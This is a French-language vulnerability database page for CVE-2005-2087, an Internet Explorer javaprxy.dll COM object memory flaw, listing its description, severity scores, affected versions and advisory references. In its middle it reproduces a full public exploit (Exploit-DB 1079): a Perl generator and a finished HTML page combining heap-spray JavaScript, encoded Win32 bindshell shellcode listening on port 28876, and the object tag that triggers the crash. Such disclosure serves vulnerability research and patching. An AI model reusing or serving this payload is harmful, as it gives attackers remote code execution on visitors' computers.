CVE-2005-2087 : Détail

CVE-2005-2087

93.11%V3
Network
2005-06-30
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1079

Date de publication : 2005-07-04 22h00 +00:00
Auteur : k-otik
EDB Vérifié : Yes

<!-- (update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke Perl code is commented so people can test the vuln on their IE /str0ke #!/usr/bin/perl # ###################################################### # # Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched- # # Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com > # Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit # 01 July 2005 # # Description - http://www.frsirt.com/english/advisories/2005/0935 # Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx # sec-consult - http://www.sec-consult.com/184.html # # Solution : # Set Internet and Local intranet security zone settings to "High" or use # another browser until a patch is released. # # Tested on : # Internet Explorer 6 on Microsoft Windows XP SP2 # Internet Explorer 6 on Microsoft Windows XP SP1 # # Affected versions : # Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1 # Internet Explorer 6 for Microsoft Windows XP Service Pack 2 # Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 # Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1 # Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems # Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium # Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition # Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition # Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE # Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition # # Usage : perl iejavaprxyexploit.pl > mypage.html # ###################################################### # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2, 1991 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # A copy of the GNU General Public License can be found at: # http://www.gnu.org/licenses/gpl.html # or you can write to: # Free Software Foundation, Inc. # 59 Temple Place - Suite 330 # Boston, MA 02111-1307 # USA. # ###################################################### # header my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n"; # Win32 bindshell (port 28876) - SkyLined my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb". "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea". "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7". "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b". "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64". "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c". "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe". "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0". "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050". "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6". "%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650". "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa". "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656". "%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1". "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353". "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353". "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe". "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff". "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n"; # Memory my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n". "headersize = 20;\n". "slackspace = headersize+shellcode.length\n". "while (bigblock.length<slackspace) bigblock+=bigblock;\n". "fillblock = bigblock.substring(0, slackspace);\n". "block = bigblock.substring(0, bigblock.length-slackspace);\n". "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". "memory = new Array();\n". "for (i=0;i<750;i++) memory[i] = block + shellcode;\n". "</SCRIPT>\n"; # javaprxy.dll my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # footer my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n". "Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n". "by the FrSIRT < http://www.frsirt.com >\n". "Solution - http://www.frsirt.com/english/advisories/2005/0935". "</body><script>location.reload();</script></html>"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin print "$header $shellcode $code $footer"; --> <html><body> <SCRIPT language="javascript"> shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html> # milw0rm.com [2005-07-05]

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 5.1

    Microsoft>>Ie >> Version 5.2.3

      Microsoft>>Ie >> Version 6

        Microsoft>>Internet_explorer >> Version 5.1

        Microsoft>>Internet_explorer >> Version 5.01

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 6.0

        Microsoft>>Internet_explorer >> Version 6.0.2900.2180

        Références

        http://marc.info/?l=bugtraq&m=112006764714946&w=2
        Tags : mailing-list, x_refsource_BUGTRAQ
        http://www.kb.cert.org/vuls/id/959049
        Tags : third-party-advisory, x_refsource_CERT-VN
        http://www.us-cert.gov/cas/techalerts/TA05-193A.html
        Tags : third-party-advisory, x_refsource_CERT
        http://www.kb.cert.org/vuls/id/939605
        Tags : third-party-advisory, x_refsource_CERT-VN
        http://securitytracker.com/id?1014329
        Tags : vdb-entry, x_refsource_SECTRACK
        http://www.securityfocus.com/bid/14087
        Tags : vdb-entry, x_refsource_BID
        http://www.securityfocus.com/archive/1/404055
        Tags : mailing-list, x_refsource_BUGTRAQ
        http://secunia.com/advisories/15891
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://www.osvdb.org/17680
        Tags : vdb-entry, x_refsource_OSVDB
        http://www.auscert.org.au/render.html?it=5225
        Tags : third-party-advisory, x_refsource_AUSCERT
        http://www.vupen.com/english/advisories/2005/0935
        Tags : vdb-entry, x_refsource_VUPEN